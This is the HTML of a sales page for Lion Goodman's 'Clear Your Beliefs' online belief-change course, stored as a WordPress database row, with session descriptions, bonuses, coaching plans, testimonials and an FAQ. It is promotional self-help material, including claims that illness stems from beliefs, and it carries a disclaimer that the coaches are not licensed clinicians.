<em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;margin-right: 50px;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n<div style="text-align: right;"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 17:04:58', '2014-06-17 22:04:58', '', 936, 